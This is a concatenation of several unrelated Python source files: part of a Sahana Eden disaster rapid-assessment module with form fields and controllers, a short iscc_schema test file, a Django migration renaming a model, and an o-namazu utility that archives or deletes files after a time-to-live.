requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of parents/caregivers missing children?")),
Field("children_orphaned", "integer",
label = T("Children orphaned by the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have been orphaned by the disaster?")),
Field("children_unattended", "integer",
label = T("Children living on their own (without adults)"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children living on their own (without adults)?")),
Field("children_disappeared", "integer",
label = T("Children who have disappeared since the disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have disappeared without explanation in the period since the disaster?")),
Field("children_evacuated", "integer",
label = T("Children that have been sent to safe places"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of children that have been sent to safe places?")),
Field("children_evacuated_to",
label = T("Places the children have been sent to"),
comment = rat_tooltip("Where have the children been sent?")),
Field("children_with_older_caregivers", "integer",
label = T("Older people as primary caregivers of children"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_fuzzy_quantity_opts,
zero=None)),
represent = lambda opt: rat_fuzzy_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("Do you know of older people who are primary caregivers of children?")),
Field("children_in_disabled_homes", "boolean",
label = T("Children in homes for disabled children"),
comment = rat_tooltip("Are there children living in homes for disabled children in this area?")),
Field("children_in_orphanages", "boolean",
label = T("Children in orphanages"),
comment = rat_tooltip("Are there children living in orphanages in this area?")),
Field("children_in_boarding_schools", "boolean",
label = T("Children in boarding schools"),
comment = rat_tooltip("Are there children living in boarding schools in this area?")),
Field("children_in_juvenile_detention", "boolean",
label = T("Children in juvenile detention"),
comment = rat_tooltip("Are there children living in juvenile detention in this area?")),
Field("children_in_adult_prisons", "boolean",
label = T("Children in adult prisons"),
comment = rat_tooltip("Are there children living in adult prisons in this area?")),
Field("people_in_adult_prisons", "boolean",
label = T("Adults in prisons"),
comment = rat_tooltip("Are there adults living in prisons in this area?")),
Field("people_in_care_homes", "boolean",
label = T("Older people in care homes"),
comment = rat_tooltip("Are there older people living in care homes in this area?")),
Field("people_in_institutions_est_total", "integer",
label = T("Estimated total number of people in institutions"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_quantity_opts,
zero=None)),
represent = lambda opt: rat_quantity_opts.get(opt,
UNKNOWN_OPT),
comment = rat_tooltip("What is the estimated total number of people in all of these institutions?")),
Field("staff_in_institutions_present", "boolean",
label = T("Staff present and caring for residents"),
comment = rat_tooltip("Are there staff present and caring for the residents in these institutions?")),
Field("adequate_food_water_in_institutions", "boolean",
label = T("Adequate food and water available"),
comment = rat_tooltip("Is adequate food and water available for these institutions?")),
Field("child_activities_u12f_pre_disaster", "list:integer",
label = T("Activities of girls <12yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did girls <12yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_u12f_pre_disaster_other",
label = T("Other activities of girls<12yrs before disaster")),
Field("child_activities_u12m_pre_disaster", "list:integer",
label = T("Activities of boys <12yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys <12yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_u12m_pre_disaster_other",
label = T("Other activities of boys <12yrs before disaster")),
Field("child_activities_o12f_pre_disaster", "list:integer",
label = T("Activities of girls 13-17yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys girls 13-17yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_o12f_pre_disaster_other",
label = T("Other activities of girls 13-17yrs before disaster")),
Field("child_activities_o12m_pre_disaster", "list:integer",
label = T("Activities of boys 13-17yrs before disaster"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How did boys 13-17yrs spend most of their time prior to the disaster?",
multiple=True)),
Field("child_activities_o12m_pre_disaster_other",
label = T("Other activities of boys 13-17yrs before disaster")),
Field("child_activities_u12f_post_disaster", "list:integer",
label = T("Activities of girls <12yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do girls <12yrs spend most of their time now?",
multiple=True)),
Field("child_activities_u12f_post_disaster_other",
label = T("Other activities of girls<12yrs")),
Field("child_activities_u12m_post_disaster", "list:integer",
label = T("Activities of boys <12yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do boys <12yrs spend most of their time now?",
multiple=True)),
Field("child_activities_u12m_post_disaster_other",
label = T("Other activities of boys <12yrs")),
Field("child_activities_o12f_post_disaster", "list:integer",
label = T("Activities of girls 13-17yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do girls 13-17yrs spend most of their time now?",
multiple=True)),
Field("child_activities_o12f_post_disaster_other",
label = T("Other activities of girls 13-17yrs")),
Field("child_activities_o12m_post_disaster", "list:integer",
label = T("Activities of boys 13-17yrs now"),
requires = IS_EMPTY_OR(IS_IN_SET(rat_child_activity_opts,
zero=None,
multiple=True)),
represent = lambda opt, set=rat_child_activity_opts: \
rat_represent_multiple(set, opt),
comment = rat_tooltip("How do boys 13-17yrs spend most of their time now?",
multiple=True)),
Field("child_activities_o12m_post_disaster_other",
label = T("Other activities of boys 13-17yrs")),
Field("coping_activities_elderly", "boolean",
label = T("Older people participating in coping activities"),
comment = rat_tooltip("Do older people in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_women", "boolean",
label = T("Women participating in coping activities"),
comment = rat_tooltip("Do women in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_disabled", "boolean",
label = T("Disabled participating in coping activities"),
comment = rat_tooltip("Do people with disabilities in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_minorities", "boolean",
label = T("Minorities participating in coping activities"),
comment = rat_tooltip("Do minority members in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("coping_activities_adolescent", "boolean",
label = T("Adolescent participating in coping activities"),
comment = rat_tooltip("Do adolescent and youth in your community participate in activities that help them cope with the disaster? (ex. meetings, religious activities, volunteer in the community clean-up, etc)")),
Field("current_general_needs", "text",
label = T("Current greatest needs of vulnerable groups"),
comment = rat_tooltip("In general, what are the greatest needs of older people, people with disabilities, children, youth and women in your community?")),
s3_comments(),
*s3_meta_fields())
# CRUD strings
crud_strings[tablename] = rat_section_crud_strings
configure(tablename, deletable=False)
# Sections as components of RAT
add_components("assess_rat",
assess_section2={"joinby": "assessment_id",
"multiple": False,
},
assess_section3={"joinby": "assessment_id",
"multiple": False,
},
assess_section4={"joinby": "assessment_id",
"multiple": False,
},
assess_section5={"joinby": "assessment_id",
"multiple": False,
},
assess_section6={"joinby": "assessment_id",
"multiple": False,
},
assess_section7={"joinby": "assessment_id",
"multiple": False,
},
assess_section8={"joinby": "assessment_id",
"multiple": False,
},
assess_section9={"joinby": "assessment_id",
"multiple": False,
},
)
# -----------------------------------------------------------------------------
def assess_rat_summary(r, **attr):
""" Aggregate reports """
if r.name == "rat":
if r.representation == "html":
return dict()
elif r.representation == "xls":
return None
else:
# Other formats?
raise HTTP(501, body=ERROR.BAD_FORMAT)
else:
raise HTTP(501, body=ERROR.BAD_METHOD)
s3db.set_method("assess", "rat",
method="summary",
action=assess_rat_summary)
# Pass variables back to global scope (response.s3.*)
# =========================================================================
# UN Common Operational Datasets
# =========================================================================
# Population Statistics
tablename = "assess_population"
define_table(tablename,
location_id(widget = S3LocationAutocompleteWidget(),
requires = IS_LOCATION()),
Field("population", "integer"),
Field("households", "integer"),
Field("median_age", "double"),
Field("average_family_size", "double"),
Field("effective_date", "datetime"),
s3_comments(),
*(s3_timestamp() + s3_uid() + s3_deletion_status()))
# CRUD strings
crud_strings[tablename] = Storage(
label_create = T("Add Population Statistic"),
title_display = T("Population Statistic Details"),
title_list = T("Population Statistics"),
title_update = T("Edit Population Statistic"),
label_list_button = T("List Population Statistics"),
label_delete_button = T("Delete Population Statistic"),
msg_record_created = T("Population Statistic added"),
msg_record_modified = T("Population Statistic updated"),
msg_record_deleted = T("Population Statistic deleted"),
msg_list_empty = T("No Population Statistics currently registered"),
name_nice = T("Population Statistic"),
name_nice_plural = T("Population Statistics"))
# Impact as component of incident reports
#add_components("irs_ireport", impact_impact="ireport_id")
# =========================================================================
def impact_tables():
""" Load the Impact tables as-needed """
sector_id = s3db.org_sector_id
ireport_id = s3db.irs_ireport_id
# Load the models we depend on
if settings.has_module("assess"):
assess_tables()
assess_id = s3.assess_id
module = "impact"
# -------------------------------------------------------------------------
# Impact Type
resourcename = "type"
tablename = "%s_%s" % (module, resourcename)
db.define_table(tablename,
Field("name", length=128, notnull=True, unique=True),
sector_id(),
*s3_meta_fields())
# CRUD strings
ADD_IMPACT_TYPE = T("Add Impact Type")
s3.crud_strings[tablename] = Storage(
label_create = ADD_IMPACT_TYPE,
title_display = T("Impact Type Details"),
title_list = T("Impact Types"),
title_update = T("Edit Impact Type"),
label_list_button = T("List Impact Types"),
label_delete_button = T("Delete Impact Type"),
msg_record_created = T("Impact Type added"),
msg_record_modified = T("Impact Type updated"),
msg_record_deleted = T("Impact Type deleted"),
msg_list_empty = T("No Impact Types currently registered"),
name_nice = T("Impact"),
name_nice_plural = T("Impacts"))
def impact_type_comment():
if auth.has_membership(auth.id_group("'Administrator'")):
return S3AddResourceLink(c="assess",
f="type",
vars=dict(child="impact_type_id"))
else:
return None
represent = S3Represent(tablename)
impact_type_id = S3ReusableField("impact_type_id", "reference %s" % tablename,
sortby="name",
requires = IS_NULL_OR(
IS_ONE_OF(db,
"impact_type.id",
represent,
sort=True)),
represent = represent,
label = T("Impact Type"),
comment = impact_type_comment(),
ondelete = "RESTRICT")
# =====================================================================
# Impact
# Load model
ireport_id = s3db.irs_ireport_id
tablename = "assess_impact"
define_table(tablename,
ireport_id(readable=False, writable=False),
assess_id(readable=False, writable=False),
impact_type_id(),
Field("value", "double"),
Field("severity", "integer",
requires = IS_EMPTY_OR(IS_IN_SET(assess_severity_opts)),
widget=SQLFORM.widgets.radio.widget,
represent = s3_assess_severity_represent,
default = 0),
s3_comments(),
*s3_meta_fields())
# CRUD strings
ADD_IMPACT = T("Add Impact")
crud_strings[tablename] = Storage(
label_create = ADD_IMPACT,
title_display = T("Impact Details"),
title_list = T("Impacts"),
title_update = T("Edit Impact"),
label_list_button = T("List Impacts"),
label_delete_button = T("Delete Impact"),
msg_record_created = T("Impact added"),
msg_record_modified = T("Impact updated"),
msg_record_deleted = T("Impact deleted"),
msg_list_empty = T("No Impacts currently registered"))
# =============================================================================
def index():
""" Module's Home Page """
module_name = settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# -----------------------------------------------------------------------------
def create():
""" Redirect to assess/create """
redirect(URL(f="assess", args="create"))
# =============================================================================
# UN Common Operational Datasets
# =============================================================================
def population():
""" RESTful controller """
output = s3_rest_controller()
return output
# =============================================================================
# Rapid Assessments
# =============================================================================
def rat():
""" Rapid Assessments, RESTful controller """
# Load Models
assess_tables()
tablename = "%s_%s" % (module, resourcename)
table = db[tablename]
# Villages only
#table.location_id.requires = IS_NULL_OR(IS_ONE_OF(db(db.gis_location.level == "L5"),
# "gis_location.id",
# repr_select, sort=True))
# Subheadings in forms:
configure("assess_section2",
subheadings = {
T("Population and number of households"): "population_total",
T("Fatalities"): "dead_women",
T("Casualties"): "injured_women",
T("Missing Persons"): "missing_women",
T("General information on demographics"): "household_head_elderly",
T("Comments"): "comments"})
configure("assess_section3",
subheadings = {
T("Access to Shelter"): "houses_total",
T("Water storage containers in households"): "water_containers_available",
T("Other non-food items"): "cooking_equipment_available",
T("Shelter/NFI Assistance"): "nfi_assistance_available",
T("Comments"): "comments"})
configure("assess_section4",
subheadings = {
T("Water supply"): "water_source_pre_disaster_type",
T("Water collection"): "water_coll_time",
T("Places for defecation"): "defec_place_type",
T("Environment"): "close_industry",
T("Latrines"): "latrines_number",
T("Comments"): "comments"})
configure("assess_section5",
subheadings = {
T("Health services status"): "health_services_pre_disaster",
T("Current health problems"): "health_problems_adults",
T("Nutrition problems"): "malnutrition_present_pre_disaster",
T("Comments"): "comments"})
configure("assess_section6",
subheadings = {
T("Existing food stocks"): "food_stocks_main_dishes",
T("food_sources") : "Food sources",
T("Food assistance"): "food_assistance_available",
T("Comments"): "comments"})
configure("assess_section7",
subheadings = {
"%s / %s" % (T("Sources of income"),
T("Major expenses")): "income_sources_pre_disaster",
T("Business Damaged"): "Access to cash",
T("Current community priorities"): "rank_reconstruction_assistance",
T("Comments"): "comments"})
configure("assess_section8",
subheadings = {
T("Access to education services"): "schools_total",
T("Alternative places for studying"): "alternative_study_places_available",
T("School activities"): "schools_open_pre_disaster",
T("School attendance"): "children_0612_female",
T("School assistance"): "school_assistance_available",
T("Comments"): "comments"})
configure("assess_section9",
subheadings = {
T("Physical Safety"): "vulnerable_groups_safe_env",
T("Separated children, caregiving arrangements"): "children_separated",
T("Persons in institutions"): "children_in_disabled_homes",
T("Activities of children"): "child_activities_u12f_pre_disaster",
T("Coping Activities"): "coping_activities_elderly",
T("Current general needs"): "current_general_needs",
T("Comments"): "comments"})
# @ToDo Generalize this and make it available as a function that other
# component prep methods can call to set the default for a join field.
def prep(r):
if r.interactive:
# Pre-populate staff ID
staff_id = auth.s3_logged_in_human_resource()
if staff_id:
r.table.staff_id.default = staff_id
if r.method == "create":
# If this assessment is being created as a component of a shelter,
# it will have the shelter id in its vars.
shelter_id = r.get_vars.get("rat.shelter_id", None)
if shelter_id:
try:
shelter_id = int(shelter_id)
except ValueError:
pass
else:
r.table.shelter_id.default = shelter_id
return True
response.s3.prep = prep
# Post-processor
def postp(r, output):
s3_action_buttons(r, deletable=False)
# Redirect to update view to open tabs
if r.representation == "html" and r.method == "create":
r.next = r.url(method="", id=s3base.s3_get_last_record_id("assess_rat"))
return output
response.s3.postp = postp
# Over-ride the listadd since we're not a component here
configure(tablename, create_next="", listadd=True)
tabs = [(T("Identification"), None),
(T("Demographic"), "section2"),
(T("Shelter & Essential NFIs"), "section3"),
(T("WatSan"), "section4"),
(T("Health"), "section5"),
(T("Nutrition"), "section6"),
(T("Livelihood"), "section7"),
(T("Education"), "section8"),
(T("Protection"), "section9") ]
rheader = lambda r: rat_rheader(r,
tabs)
output = s3_rest_controller(rheader=rheader,
s3ocr_config={"tabs": tabs})
response.s3.stylesheets.append( "S3/rat.css" )
return output
# -----------------------------------------------------------------------------
def rat_rheader(r, tabs=[]):
""" Resource Headers """
if r.representation == "html":
if r.name == "rat":
report = r.record
if report:
htable = db.hrm_human_resource
rheader_tabs = s3_rheader_tabs(r, tabs, paging=True)
location = report.location_id
if location:
location = r.table.location_id.represent(location)
staff = report.staff_id
if staff:
organisation_represent = htable.organisation_id.represent
query = (htable.id == staff)
organisation_id = db(query).select(htable.organisation_id,
limitby=(0, 1)).first().organisation_id
organisation = organisation_represent(organisation_id)
else:
organisation = None
staff = report.staff2_id
if staff:
query = (htable.id == staff)
organisation2_id = db(query).select(htable.organisation_id,
limitby=(0, 1)).first().organisation_id
if organisation2_id == organisation_id:
organisation2 = None
else:
organisation2 = organisation_represent(organisation_id)
else:
organisation2 = None
if organisation2:
orgs = "%s, %s" % (organisation, organisation2)
else:
orgs = organisation
rheader = DIV(TABLE(
TR(
TH("%s: " % T("Location")), location,
TH("%s: " % T("Date")), report.date
),
TR(
TH("%s: " % T("Organizations")), orgs,
)
),
rheader_tabs)
return rheader
return None
# =============================================================================
# Flexible Impact Assessments
# =============================================================================
def assess_rheader(r, tabs=[]):
""" Resource Headers for Flexible Impact Assessments """
if r.representation == "html":
rheader_tabs = s3_rheader_tabs(r, tabs)
assess = r.record
if assess:
table = db.assess_assess
rheader = DIV(TABLE(TR(
TH("%s: " % T("Date & Time")),
table.datetime.represent(assess.datetime),
TH("%s: " % T("Location")),
table.location_id.represent(assess.location_id),
TH("%s: " % T("Assessor")),
table.assessor_person_id.represent(assess.assessor_person_id),
),
),
rheader_tabs
)
return rheader
return None
# -----------------------------------------------------------------------------
def assess():
""" RESTful CRUD controller """
# Load Models
assess_tables()
impact_tables()
tablename = "%s_%s" % (module, resourcename)
table = db[tablename]
# Pre-processor
def prep(r):
if session.s3.mobile and r.method == "create" and r.interactive:
# redirect to mobile-specific form:
redirect(URL(f="assess_short_mobile"))
return True
response.s3.prep = prep
#table.incident_id.comment = DIV(_class="tooltip",
# _title="%s|%s" % (T("Incident"),
# T("Optional link to an Incident which this Assessment was triggered by.")))
tabs = [
(T("Edit Details"), None),
(T("Baselines"), "baseline"),
(T("Impacts"), "impact"),
(T("Summary"), "summary"),
#(T("Requested"), "ritem"),
]
rheader = lambda r: assess_rheader(r, tabs)
return s3_rest_controller(rheader=rheader)
# -----------------------------------------------------------------------------
def impact_type():
""" RESTful CRUD controller """
# Load Models
impact_tables()
module = "impact"
resourcename = "type"
return s3_rest_controller(module, resourcename)
# -----------------------------------------------------------------------------
def baseline_type():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# -----------------------------------------------------------------------------
def baseline():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# -----------------------------------------------------------------------------
def summary():
""" RESTful CRUD controller """
# Load Models
assess_tables()
return s3_rest_controller()
# =============================================================================
def basic_assess():
""" Custom page to hide the complexity of the Assessments/Impacts/Summary model: PC Browser version """
if not auth.is_logged_in():
session.error = T("Need to be logged-in to be able to submit assessments")
redirect(URL(c="default", f="user", args=["login"]))
# Load Models
assess_tables()
impact_tables()
# See if we've been created from an Incident
ireport_id = request.vars.get("ireport_id")
if ireport_id:
# Location is the same as the calling Incident
table = db.irs_ireport
row = db(table.id == ireport_id).select(table.location_id,
limitby=(0, 1)).first()
if row:
irs_location_id = row.location_id
location = table.location_id.represent(irs_location_id)
else:
irs_location_id = None
location = None
custom_assess_fields = (
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields,
location_id=irs_location_id)
else:
location = None
custom_assess_fields = (
("assess", "location_id", "selector"),
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields)
if form_accepted:
session.confirmation = T("Basic Assessment Reported")
redirect(URL(f="assess", args=[assess_id, "impact"]))
return dict(title = T("Basic Assessment"),
location = location,
form = form)
# -----------------------------------------------------------------------------
def mobile_basic_assess():
""" Custom page to hide the complexity of the Assessments/Impacts/Summary model: Mobile device version """
if not auth.is_logged_in():
redirect(URL(c="default", f="index"))
# Load Models
assess_tables()
impact_tables()
custom_assess_fields = (
("assess", "location_id", "auto"),
("impact", 1),
("impact", 2),
("impact", 3),
("impact", 4),
("impact", 5),
("impact", 6),
("impact", 7),
("assess", "comments"),
)
form, form_accepted, assess_id = custom_assess(custom_assess_fields)
if form_accepted:
form = FORM(H1(settings.get_system_name_short()),
H2(T("Short Assessment")),
P(T("Assessment Reported")),
A(T("Report Another Assessment..."),
_href = URL(r=request)
),
_class = "mobile",
)
return dict(form = form)
# -----------------------------------------------------------------------------
def color_code_severity_widget(widget, name):
""" Utility function to colour-code Severity options """
for option, color in zip(widget, ["green", "yellow", "orange", "red"]):
option[0].__setitem__("_style", "background-color:%s;" % color)
option[0][0].__setitem__("_name", name)
return widget
# -----------------------------------------------------------------------------
def custom_assess(custom_assess_fields, location_id=None):
"""
Build a custom page to hide the complexity of the
Assessments/Impacts/Summary model
@ToDo: Improved validation
- the existing .double JS isn't 100% reliable & this currently crashes
the back-end upon submission if bad data slips through
"""
# Load Models
assess_tables()
impact_tables()
form_rows = []
comment = ""
for field in custom_assess_fields:
name = "custom_%s_%s" % (field[0], field[1])
if field[0] == "assess":
if field[1] == "comments":
label = "%s:" % db.assess_assess[ field[1] ].label
#widget = db.assess_assess[ field[1] ].widget
widget = TEXTAREA(_name = name,
_class = "double",
_type = "text")
elif field[1] == "location_id":
if field[2] == "auto":
# HTML5 Geolocate
label = "%s:" % T("Location")
#widget = db.assess_assess[ field[1] ].widget
widget = DIV(INPUT(_name = name,
_type = "text"),
INPUT(_name = "gis_location_lat",
_id = "gis_location_lat",
_type = "text"),
INPUT(_name = "gis_location_lon",
_id = "gis_location_lon",
_type = "text"))
else:
# Location Selector
label = "%s:" % T("Location")
#widget = SELECT(_id = name,
# _class = "reference gis_location",
# _name = "location_id")
#response.s3.gis.location_id = "custom_assess_location_id"
widget = db.assess_assess.location_id.widget(field=db.assess_assess.location_id,
value="")
elif field[0] == "baseline":
label = S3Represent(lookup="assess_baseline_type")(field[1])
label = "%s:" % T(label)
widget = INPUT(_name = name,
_class = "double",
_type = "text")
elif field[0] == "impact":
label = S3Represent(lookup="assess_impact_type")(field[1])
label = "%s:" % T(label)
value_widget = INPUT(_name = name,
_class = "double",
_type = "text")
severity_widget = db.assess_summary.value.widget(db.impact_impact.severity,
0,
_name = "%s_severity" % name
)
severity_widget = color_code_severity_widget(severity_widget,
"%s_severity" % name)
widget = DIV(value_widget,
DIV("%s:" % T("Severity")),
severity_widget,
XML(" "))
elif field[0] == "summary":
label = "%s:" % T(org_subsector_represent(field[1]))
widget = db.assess_summary.value.widget(db.assess_summary.value,
0, _name = name)
widget = color_code_severity_widget(widget)
# Add the field components to the form_rows
if field[0] == "title":
form_rows.append(TR(H3( field[1] )))
else:
form_rows = form_rows + list(s3_formstyle("%s__row" % name,
label,
widget,
comment))
form = FORM(TABLE(*form_rows),
INPUT(_value = T("Save"), _type = "submit"))
assess_id = None
form_accepted = form.accepts(request.vars, session)
if form_accepted:
record_dict = {"organisation_id" : session.s3.organisation_id}
for field in custom_assess_fields:
if field[0] != "assess" or field[1] == "location":
continue
name = "custom__assess_%s" % field[1]
if name in request.vars:
record_dict[field[1]] = request.vars[name]
# Add Location (must happen first)
if "custom_assess_location_id" in request.vars:
# Auto
location_dict = {}
if "gis_location_lat" in request.vars:
location_dict["lat"] = request.vars["gis_location_lat"]
if "gis_location_lon" in request.vars:
location_dict["lon"] = request.vars["gis_location_lon"]
location_dict["name"] = request.vars["custom_assess_location_id"]
record_dict["location_id"] = s3db.gis_location.insert(**location_dict)
if "location_id" in request.vars:
# Location Selector
record_dict["location_id"] = request.vars["location_id"]
if location_id:
# Location_id was passed to function
record_dict["location_id"] = location_id
# Add Assessment
assess_id = db.assess_assess.insert(**record_dict)
fk_dict = dict(baseline = "baseline_type_id",
impact = "impact_type_id",
summary = "subsector_id"
)
component_dict = dict(baseline = "assess_baseline",
impact = "impact_impact",
summary = "assess_summary"
)
# Add Assessment Components
sector_summary = {}
for field in custom_assess_fields:
if field[0] == "assess":
continue
record_dict = {}
name = "custom_%s_%s" % (field[0], field[1])
if name in request.vars:
record_dict["assess_id"] = assess_id
record_dict[fk_dict[ field[0] ] ] = field[1]
record_dict["value"] = request.vars[name]
if field[0] == "impact":
severity = int(request.vars[name + "_severity"])
record_dict["severity"] = severity
if not record_dict["value"] and not record_dict["severity"]:
# Do not record impact if there is no data for it.
# Should we still average severity though? Now not doing this
continue
# Record the Severity per sector
table = db.impact_type
row = db(table.id == field[1]).select(table.sector_id,
limitby=(0, 1)
).first()
sector_id = row.sector_id
if sector_id in sector_summary.keys():
sector_summary[sector_id].append(severity)
elif sector_id:
sector_summary[sector_id] = [severity]
db[component_dict[ field[0] ] ].insert(**record_dict)
# Add Cluster summaries
# @ToDo: make sure that this doesn't happen if there are sectors in the assess
for sector_id in sector_summary.keys():
severity_values = sector_summary[sector_id]
db.assess_summary.insert(assess_id = assess_id,
sector_id = sector_id,
# Average severity
value = sum(severity_values) / len(severity_values)
)
# Send Out Notification SMS
#message = "Sahana: " + T("New Assessment reported from") + " %s by %s %s" % ( location_dict["name"],
# session.auth.user.first_name,
# session.auth.user.last_name
# )
# Hard coded notification message for Demo
#msg.send_by_pe_id(3,
# message=message,
# contact_method = 2)
return form, form_accepted, assess_id
# =============================================================================
def type():
""" RESTful CRUD controller """
return s3_rest_controller("impact", "type")
# =============================================================================
def impact():
""" RESTful CRUD controller """
return s3_rest_controller("impact", "impact")
# END =========================================================================
|
# -*- coding: utf-8 -*-
from iscc_schema import generator
def test_iscc_request():
r = generator.IsccCodePostRequest(source_url="https://example.com")
assert r.json(exclude_unset=True) == '{"source_url": "https://example.com"}'
def test_data_uri():
durl = "data:application/json;charset=utf-8;base64,eyJleHRlbmRlZCI6Im1ldGFkYXRhIn0="
r = generator.IsccCodePostRequest(meta=durl)
assert r.meta == durl
def test_ipfs_uri():
ipfs = "ipfs://f01551220b94d27b9934d3e08a52e52d7da7dabfac484efe37a5380ee9088f7ace2efcde9"
r = generator.MediaEmbeddedMetadata(license=ipfs)
assert r.license == ipfs
|
# Generated by Django 2.2.4 on 2019-08-09 17:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('editor', '0003_auto_20190809_1724'),
]
operations = [
migrations.RenameModel(
old_name='PythonLabs',
new_name='PythonLab',
),
]
|
from pathlib import Path
from datetime import datetime, timezone
from onamazu import db_file_operator as dfo
import os
import shutil
import logging
import zipfile
logger = logging.getLogger("o-namazu")
def sweep(config, now: datetime = None):
if now is None:
now = datetime.now()
logger.debug(f"Sweeep started. config:{config}, now:{now}")
dfo.update_all_db_files(config, _sweep_callback, {"now": now})
def _sweep_callback(dbs: dict, config_all: dict, obj: dict):
now = obj['now']
for dir, dir_db in dbs.items():
dir_config = config_all[dir]
dir_path = Path(dir)
expired_file_list = _sweep_directory_list_target(dir_path, dir_db, dir_config, now)
_sweep_directory_files(dir_path, expired_file_list, dir_db, dir_config, now)
def _sweep_directory_list_target(dir_path: Path, dir_db: dict, dir_config: dict, now: datetime) -> list:
# Path: last_detected
last_detected_list = {str(dir_path / file): d["last_detected"] for file, d in dir_db["watching"].items()}
now_timestamp = now.timestamp()
ttl = dir_config["ttl"]
if ttl <= 0: # 0 is soon, -1 is never archive.
return []
for f, l_timestamp in last_detected_list.items():
diff = now_timestamp - l_timestamp
logger.debug(f"Sweep test: {dir_path / f}: {l_timestamp}. diff = {diff}, ttl = {ttl}")
return [Path(f) for f, l_timestamp in last_detected_list.items() if now_timestamp - l_timestamp >= ttl]
def _sweep_directory_files(dir_path: Path, files: list, dir_db: dict, dir_config: dict, now: datetime = None):
if now is None:
now = datetime.now()
ttl = dir_config["ttl"]
archive = dir_config["archive"]
archive_type = archive.get("type", "directory")
archive_name = archive.get("name", "_archive")
# Type: delete
if archive_type == "delete":
for file in files:
try:
os.remove(str(file))
logger.info(f"Deleted file '{file}' because ttl({ttl}) is expired.")
except Exception:
logger.exception(f"Delete '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
archive_path = dir_path / archive_name
# Type: zip
if archive_type == "zip":
with zipfile.ZipFile(str(archive_path), 'a', compression=zipfile.ZIP_DEFLATED) as zip_file:
for file in files:
arcname = file.name
if file.name in zip_file.namelist():
arcname = __generate_name_with_datetime(file, now)
try:
zip_file.write(str(file), arcname=arcname)
os.remove(str(file))
logger.info(f"Archive file '{file}' into zip `{archive_path}` because ttl({ttl}) is expired.")
except Exception:
logger.exception(f"Delete '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
# Type: directory
if archive_type == "directory":
if not archive_path.exists():
archive_path.mkdir(parents=True)
for file in files:
try:
logger.info(f"Archive file '{file}' into `{archive_path}` because ttl({ttl}) is expired.")
dst_file_path = archive_path / file.name
if dst_file_path.exists():
dst_file_path = archive_path / __generate_name_with_datetime(file, now)
logger.warning(f"Archive file '{file}' is already exists in `{archive_path}`. It will be save as '{dst_file_path}")
shutil.move(str(file), str(dst_file_path))
except Exception:
logger.exception(f"Move '{file}' failed.")
finally:
del dir_db["watching"][str(file.name)]
return
def __generate_name_with_datetime(file_path: Path, now: datetime):
return file_path.stem + '_' + now.strftime('%Y%m%d%H%M%S') + file_path.suffix
|
